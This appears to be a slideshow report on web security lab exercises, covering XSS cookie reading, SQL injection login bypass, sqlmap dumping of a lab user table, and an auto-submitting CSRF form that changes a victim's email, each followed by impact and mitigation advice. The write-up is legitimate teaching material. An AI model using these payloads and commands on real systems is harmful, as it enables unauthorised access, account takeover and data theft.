Ethical Hacking Techniques for Web Application Security

S olving Labs that are created for the following vulnerabilities: Login Bypass Admin Credentials Access (SQLi) CSRF XSS

Abstract: The objective of this report is to solve labs designed to demonstrate vulnerabilities in web applications. These labs focus on the following vulnerabilities: Login Bypass Admin Credentials Access (SQLi) Cross-Site Request Forgery (CSRF) Cross-Site Scripting (XSS) Utilizing VMware for penetration testing, the objective is to comprehensively investigate and demonstrate identified vulnerabilities. Each vulnerability will be assessed based on its impact . Recommendations for mitigating each vulnerability will be provided to enhance security measures. The investigation will also explore effective mechanisms and strategies to safeguard the entire web application against these vulnerabilities. This report aims to enhance understanding among web application developers, providers, and users regarding common security issues in web applications and the best practices for addressing them.

Research: Hack The Box (HTB) is a popular platform for penetration testing and ethical hacking practice. Here are some details about it: Name: Hack The Box URL: https://academy.hackthebox.com Category/Type: Penetration Testing Labs, CTF (Capture The Flag) Challenges Overall Ranking/Usage/Popularity: Hack The Box is highly popular among cybersecurity enthusiasts, penetration testers, and ethical hackers worldwide. It offers a wide range of machines with varying difficulty levels, from beginner to advanced, to simulate real-world scenarios and challenges. Users can practice their skills in areas like web application security, network penetration testing, cryptography, and more. Hack The Box also hosts regular competitions and events, contributing to its popularity within the cybersecurity community.

About XSS: Cross Site Scripting(XSS): Types of XSS Reflected XSS Stored XSS XSS - Cross-Site Scripting (XSS) is a common security vulnerability in web applications. It occurs when an attacker injects malicious scripts into web pages viewed by other users. These scripts are executed in the context of the user's browser, which can lead to various malicious activities. Reflected XSS - Reflected XSS occurs when an attacker injects a malicious script into a web application, and this script is immediately reflected (or echoed) back to the user's browser within the server's response. Stored XSS - Stored XSS occurs when an attacker injects malicious scripts (typically JavaScript) into a vulnerable web application. These scripts are stored on the server-side, such as in a database, and are later served to users when they request the compromised content.

Solving Labs: Question: What is the value of the 'flag' cookie? Lab Exploration: In our lab setup, depicted in image 1, there is an input field available. Testing for XSS Vulnerability: To determine if the website is vulnerable to XSS, we crafted a simple payload: <script>alert("Never Give up")</script> Payload Explanation: The alert() function in JavaScript is utilized to display a dialog box with the specified message, in this case, "Never Give up". Upon injecting this payload, as shown in image 2, a popup displaying our message confirms the website's susceptibility to XSS. Next Step: Now, let's proceed to extract the website's cookie using an XSS payload. Image 1 Image 2

Continuation: We employed the following JavaScript payload to access and display all cookies associated with the current domain: <script>alert( document.cookie )</script> Executing this script successfully retrieved the cookie flag from the website, as depicted in image 3." Image 3

Impact Analysis for XSS Vulnerabilities: Data Theft: Impact: Attackers can steal sensitive information like user credentials or personal data. Example: By exploiting an XSS vulnerability on a social media site, an attacker injects a script into comments to steal users' session cookies. This allows them to log in as the victim without needing their password. Session Hijacking: Impact: Attackers can take over legitimate user sessions. Example: An XSS flaw in an online banking site lets an attacker redirect a user to a malicious page that captures their session cookie. This allows unauthorized access to the victim's account. Client-Side Defacement: Impact: Attackers can modify a website's appearance, damaging trust. Example: Using XSS on an e-commerce site, an attacker posts a review with a script that changes the website's layout to display offensive content, harming the site's reputation. Malware Distribution: Impact: XSS vulnerabilities can deliver malware to users' devices. Example: An attacker exploits an XSS weakness in a news site's comment section to inject a script that downloads malware onto visitors' computers, potentially compromising their security.

Recommendations: Implement robust input validation and output encoding Action: Sanitize user inputs to strip out or neutralize potentially dangerous characters. Example: On a forum website, input fields should filter out HTML tags and JavaScript code, ensuring only plain text is displayed. This prevents attackers from injecting harmful scripts that could compromise users' browsers. Use Content Security Policy (CSP) headers Action: Implement CSP directives to specify which domains are allowed to load scripts and resources. Example: A website can set a CSP header that only allows scripts to be loaded from its own domain (self) and trusted sources ( trusted.com ). This prevents malicious scripts from unauthorized domains from executing in users' browsers. Regularly update and patch web application Action: Stay informed about security updates for frameworks like React or Angular and apply patches promptly. Example: After discovering an XSS vulnerability in a widely used JavaScript library, developers quickly release a patched version. Websites using the updated library avoid the risk of exploitation by attackers targeting the vulnerability.

Login Bypass using SQL Injection: SQL Injection is a type of cyber attack where an attacker inserts or "injects" malicious SQL code into a query. This can allow the attacker to view, modify, or delete data from a database without proper authorization. In this exercise, we will attempt to bypass the login page without a password. Initially, we will test default credentials – admin, admin. However, this approach was unsuccessful. Next, we will perform SQL Injection (SQLI) using a basic payload: admin ' or '1' = '1'-- - Unfortunately, this payload did not work. Therefore , we will proceed to brute-force the login page using various SQLI payloads. We will use payloads from the following GitHub repository: PayloadsAllTheThings - SQL Injection - Authentication Bypass Image 4 image 5

Continuation: We will utilize Burp Suite Intruder to perform a brute-force attack on the target application. The intercepted request, as shown in the attached image, has the username field designated as the target (payload encoding must be disabled). As indicated in the image, shorter payloads are effective and can bypass the login page. We will employ a straightforward payload: admin’ or 1=1# In this payload, 1=1 always evaluates to true, and the # character is used to comment out the remainder of the SQL statement, effectively ignoring the password field. Using this technique, we successfully bypassed the login mechanism and gained access to the application dashboard. Image 6 Image 7 Image 8

Impact Analysis of SQL Injection for Login Bypass: 1. Unauthorized Access Impact : Attackers can gain access to restricted areas of the application. Example : Bypassing authentication to login as an administrator. 2. Privilege Escalation Impact : Attackers can elevate their privileges within the application. Example : Accessing sensitive functions or data reserved for privileged users. 3. Data Exposure Impact : Attackers can retrieve sensitive user information. Example : Extracting user credentials or personal details from the database.

Recommendations: Validate and Sanitize Inputs Action : Check user inputs to ensure they're safe. Example : Validate username and password formats strictly. Implement Strong Authentication Action : Use multi-factor authentication (MFA). Example : Require users to verify identity through a second factor like OTPs. Regular Security Updates Action : Keep software and libraries updated. Example : Schedule routine security patches and updates. Educate Developers Action : Train developers on secure coding practices. Example : Foster awareness of SQL injection risks.

Admin credential Access using SQLI: Question: Using SQL injection, retrieve the password for the username 'Adam' stored in the SQL database. We utilized SQLMAP, an automated tool, to extract data from the database. The command used is as follows: sqlmap -u "http://94.237.60.99:38071/" --data="username= admin&password =admin123" -- dbs --batch -- dbms = mysql Explanation: SQLMAP: Tool used for automated SQL injection and database takeover. -u: Specifies the URL of the target website. --data: Defines the POST data for the request. -- dbs : Instructs SQLMAP to extract database names. --batch: Executes SQLMAP in batch mode for automated operation. -- dbms = mysql : Specifies the database management system as Mysql . Image 9(DASHBOARD)

Continuation: Results: Following execution, SQLMAP successfully identified the database structure and contents, facilitating the retrieval of necessary information to proceed with extracting the password for the username 'Adam'. The database name was retrieved as shown in the provided image. To explore the ilfreight database further and retrieve its tables, we executed the following SQLMAP command: sqlmap -u "http://94.237.60.99:38071/" --data="username= admin&password =admin123" -D ilfreight --tables --batch -- dbms = mysql Command Breakdown: -D ilfreight : Specifies the ilfreight database for SQLMAP to focus on. --tables: Instructs SQLMAP to enumerate all tables within the specified database. Outcome: We identified 2 tables within the ilfreight database. Subsequently, we proceeded to examine the 'users' table. Extracting Data from 'users' Table: To retrieve data from the 'users' table, we used the following SQLMAP command: Image 10 Image 11

Continuation: sqlmap -u "http://94.237.60.99:38071/" --data="username= admin&password =admin123" -D ilfreight -T users --dump --batch -- dbms = mysql Command Breakdown: -T users: Targets the 'users' table within the ilfreight database. --dump: Instructs SQLMAP to extract and display all data from the specified table. The command successfully retrieved data from the 'users' table, revealing stored information including the password for the user Adam. Image 12

CSRF( Cross-Site Request Forgery ): CSRF is a web security vulnerability that tricks a user into executing unwanted actions on a web application where they're authenticated. It exploits the trust that a site has in the user's browser. Question - To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server. We will change users account email id from “ [email protected] ” to [email protected] . Open Burp's browser and log in to our account. Submit the "Update email" form, and find the resulting request in our Proxy history. The resulting request URL is “/my-account/change-email”. Using this we will Create a form that submits a request to change the user's email ID. Image 13 Image 14

Continuation: <form method="POST" action="https://0aa900d8042951e28278b0d2004900a2.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value=” [email protected] "> </form> <script> document.forms [0].submit(); </script> Method: The form uses the POST method to submit data to the server. Action: The action attribute specifies the URL to which the form data will be sent. In this case, it's the endpoint for changing the user's email. Hidden Input: The input element of type "hidden" includes the new email address, [email protected] , which the attacker wants to set. Script Tag: This script automatically submits the form when the page loads. document.forms [0].submit(): This JavaScript code selects the first form on the page (in this case, the only form) and submits it immediately. User Interaction: Trick the user into clicking the link. Once the user clicks on this malicious link and the page loads, the email ID will be changed to [email protected] without the user's knowledge. Image 15

Impact analysis of CSRF: Unauthorized Actions: Attackers can perform actions on behalf of the user without their knowledge Example: Hackers change your social media password without you knowing, locking you out of your account. Data Integrity: Sensitive data could be altered or deleted, leading to potential data breaches. Example: A hacker alters grades in a school database through a software flaw, affecting student records. Loss of User Trust: Users may lose trust in the application if they realize their accounts can be manipulated without their consent. Example: A data breach leaks customer emails from an online store, making users wary of shopping there again. Financial Loss: For applications involving financial transactions, CSRF can lead to significant financial loss. Example: Cybercriminals use stolen credit card details to make unauthorized purchases online. Escalation of Privileges: If the user has administrative privileges, the attack's impact can be more severe, potentially compromising the entire system. Example: Exploiting a software bug, a hacker gains admin rights on a forum, deleting user posts at will.

Recommendation: Utilize Tokens: Action: Use anti-CSRF tokens in forms and requests to verify the origin of requests. Example: A banking application includes a unique token in each form submission. When a user attempts to transfer funds, the server verifies that the token matches, preventing forged requests from being processed. Implement SameSite cookies: Action: Set the SameSite attribute on cookies to "Strict" or "Lax" to restrict how cookies are sent in requests. Example: A social media platform ensures that session cookies are set with the SameSite attribute to prevent them from being used in CSRF attacks initiated from another website. Educate users: Action: Provide users with security awareness training to recognize phishing attempts and malicious websites. Example: An email service advises users not to click on links from unknown senders or to verify the authenticity of requests before entering sensitive information.

Reference https://owasp.org/www-community/attacks/xss/ https://portswigger.net/web-security/cross-site-scripting https://portswigger.net/web-security/sql-injection https://owasp.org/www-community/attacks/SQL_Injection https://portswigger.net/web-security/csrf https://medium.com/@ry4nnnn/portswigger-labs-csrf-10b496d6580c https://github.com/sqlmapproject/sqlmap https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/ https:// a cademy.hackthebox.com

Questions ?

Thank You!

Ethical Hacking Techniques for Web Application Security

About This Presentation

Slide Content

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Ethical Hacking Techniques for Web Application Security

About This Presentation

Slide Content

Slide 1

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14

Slide 15

Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

8-top-ai-courses-for-customer-support-representatives-in-2025.pptx

7-essential-ai-courses-for-call-center-supervisors-in-2025.pptx

25-essential-ai-courses-for-user-support-specialists-in-2025.pptx

8-essential-ai-courses-for-insurance-customer-service-representatives-in-2025.pptx

Know for Certain

PPT OPD LES 3ertt4t4tqqqe23e3e3rq2qq232.pptx